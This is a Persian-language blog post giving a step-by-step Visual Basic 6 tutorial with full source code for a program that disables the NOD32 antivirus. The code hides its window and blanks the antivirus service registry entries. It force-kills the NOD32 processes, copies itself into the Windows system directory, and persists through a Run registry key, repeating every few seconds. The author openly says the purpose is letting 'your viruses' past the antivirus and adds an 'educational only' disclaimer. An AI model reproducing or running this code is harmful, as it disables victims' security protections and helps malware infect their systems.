تبلیغات
xzqr - ساخت برنامه از کار انداختن آنتی ویروس nod32 با ویژوال بیسیک
xzqr
down at esraieel
گروه طراحی قالب من گروه طراحی قالب من گروه طراحی قالب من گروه طراحی قالب من گروه طراحی قالب من
درباره وبلاگ



مدیر وبلاگ : xzq xzqr
نویسندگان
نظرسنجی
چگونه با وبلاگ ما آشنا شدید





برای این کار باید 6 مرحله را بگذرانید:

1- ویژوال بیسیک را اجرا کنید. پروژه
Standard EXE را انتخاب و یک دکمه (Command) و یک Timer هم به فرم اضافه کنید و خاصیت interval
تایمر را هم برابر 3000 قرار دهید.

2- روی فرم (
form
) دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:

Private Sub Form_Load()
  n = 30
  App.TaskVisible = False
  If App.Path = SysDir Then Me.Hide
  App.TaskVisible = False
  Command1_Click
  End If
End Sub


3- روی Command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:

Private Sub Command1_Click()
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"
  Shell "taskkill /f /im NOD32KRN.EXE", vbHide
  Shell "taskkill /f /im NOD32KUI.EXE", vbHide
  If App.Path <> SysDir Then
   MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"
   FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"
  End If
End Sub


4-
در قسمت General فرم، کد زیر را وارد کنید:

Dim n As Integer


5- در مرحله آخر، روی Timer دوبار کلیک کنید و کدهای زیر را وارد کنید:

Private Sub Timer1_Timer()
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""
  SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"
  Shell "taskkill /f /im NOD32KRN.EXE", vbHide
  Shell "taskkill /f /im NOD32KUI.EXE", vbHide
End Sub


6- یک ماژول (Module) درست کنید (از منوی Project) و کدهای زیر را درونش کپی کنید:

Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CURRENT_USER = &H80000001

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long

Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long

Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long

Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const REG_SZ = 1

Public Const REG_DWORD = 4

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

Public Function SysDir() As String
  Dim SysPath As String
  SysPath = String(255, vbNullChar)
  GetSystemDirectory SysPath, 255
  SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)
End Function

Public Function exist(name As String) As Boolean
  exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")
End Function

Public Function GetString(Hkey As Long, strPath As String, strValue As String)
    Dim keyhand As Long
    Dim datatype As Long
    Dim lResult As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    r = RegOpenKey(Hkey, strPath, keyhand)
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
    If lValueType = REG_SZ Then
    strBuf = String(lDataBufSize, " ")
    lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
    If lResult = ERROR_SUCCESS Then
    intZeroPos = InStr(strBuf, Chr$(0))
    If intZeroPos > 0 Then
    GetString = Left$(strBuf, intZeroPos - 1)
    Else
    GetString = strBuf
    End If
    End If
    End If
End Function

Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)
    Dim keyhand As Long
    Dim r As Long
    r = RegCreateKey(Hkey, strPath, keyhand)
    r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
    r = RegCloseKey(keyhand)
End Sub

Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
    Dim lResult As Long
    Dim keyhand As Long
    Dim r As Long
    r = RegCreateKey(Hkey, strPath, keyhand)
    lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
    r = RegCloseKey(keyhand)
End Function


تبریک می گویم! حالا دیگر ویروس های شما از سد آنتی ویروس

منبع:xzqr

این بخش صرفا جنبه اموزشی داشته و برای ارتقائ اطلاعات افراد طراحی گردیده است
پس هر گونه سوئ استفاده از مطالب و محتویاتی که در این بخش قرار میگیرد

به عهد شخصی که استفاده نادرست کرده میباشد و سایت و افرادی که گذارنده برنامه میباشند
هیچگونه مسئولیتی نخواهند داشت





صفحات جانبی
آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :
امکانات جانبی